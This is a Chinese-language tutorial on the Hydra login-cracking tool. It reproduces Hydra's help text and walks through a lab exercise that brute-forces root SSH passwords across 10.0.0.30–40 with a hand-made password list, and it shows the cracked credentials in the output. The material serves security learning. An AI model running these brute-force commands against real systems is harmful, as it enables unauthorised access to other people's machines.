hydra
帮助
hydra -h
返回结果:
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]
Options:
-R restore a previous aborted/crashed session
-I ignore an existing restore file (don't wait 10 seconds)
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-y disable use of symbols in bruteforce, see above
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-o FILE write found login/password pairs to FILE instead of stdout
-b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel per target (default: 16)
-T TASKS run TASKS connects in parallel overall (for -M, default: 64)
-w / -W TIME wait time for a response (32) / between connects per thread (0)
-c TIME wait time per login attempt over all threads (enforces -t 1)
-4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-O use old SSL v2 and v3
-q do not print messages about connection errors
-U service module usage details
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: afp ncp oracle sapr3.
Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
% export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
% export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
% export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
解释:
-l
指定的用户名称
-P
指定密码文件,也就是字典文件
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
解释:
-C
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
解释:
-L
指定用户名文件,用户名列表文件
-P
指定密码文件,也就是字典文件
-M
主机的IP地址列表文件
ssh
要破解的服务,这里破解的服务是ssh
解释:
-L
制定用户名文件,指定用户名列表文件
-l
指定用户名,用户名称
-P(大P)
指定密码文件,字典
-C
指定用户名文件
-p(小p)
指定密码,单个密码
-M
指定主机列表文件,也就是主机的IP地址
-e nsr
空密码
-o
把输出结果写入到指定的文件中
实验1破解10.0.0.30-10.0.0.40段的ssh服务
1.手动生成密码文件
vim pass.txt
输入以下内容根据自己的密码输入
asdf
asdfqwe
qwerasd
asdfghjkl
zxcvbnm
admin123
asdf123
admin123567890
1234567890
12345
123456
1234
2.生成主机IP段文件
vim hostlist.txt
10.0.0.30
10.0.0.31
10.0.0.32
10.0.0.33
10.0.0.34
10.0.0.35
10.0.0.36
10.0.0.37
10.0.0.38
10.0.0.39
10.0.0.40
3.开始暴力破解
hydra -l root -P pass.txt -M hostlist.txt ssh
返回结果:
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-05 19:18:46
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 13 tasks per 12 servers, overall 64 tasks, 13 login tries (l:1/p:13), ~3 tries per task
[DATA] attacking ssh://(12 targets):22/
[ERROR] could not resolve address:
[ERROR] could not connect to ssh://10.0.0.33:22 - No route to host
[ERROR] could not connect to ssh://10.0.0.34:22 - No route to host
[ERROR] could not connect to ssh://10.0.0.35:22 - No route to host
[ERROR] could not connect to ssh://10.0.0.36:22 - No route to host
[ERROR] could not connect to ssh://10.0.0.37:22 - No route to host
[ERROR] could not connect to ssh://10.0.0.38:22 - No route to host
[ERROR] could not connect to ssh://10.0.0.39:22 - No route to host
[ERROR] could not connect to ssh://10.0.0.40:22 - No route to host
[ERROR] could not connect to ssh://(null):22 - Hostname required
[22][ssh] host: 10.0.0.32 login: root password: 123456
[22][ssh] host: 10.0.0.31 login: root password: 123456
[22][ssh] host: 10.0.0.30 login: root password: 123456
3 of 12 targets successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-05 19:19:14
这里可以看到32.31.30主机的密码是123456用户名是root
4.或者制定ip地址
hydra -l root -P pass.txt 10.0.0.32 ssh
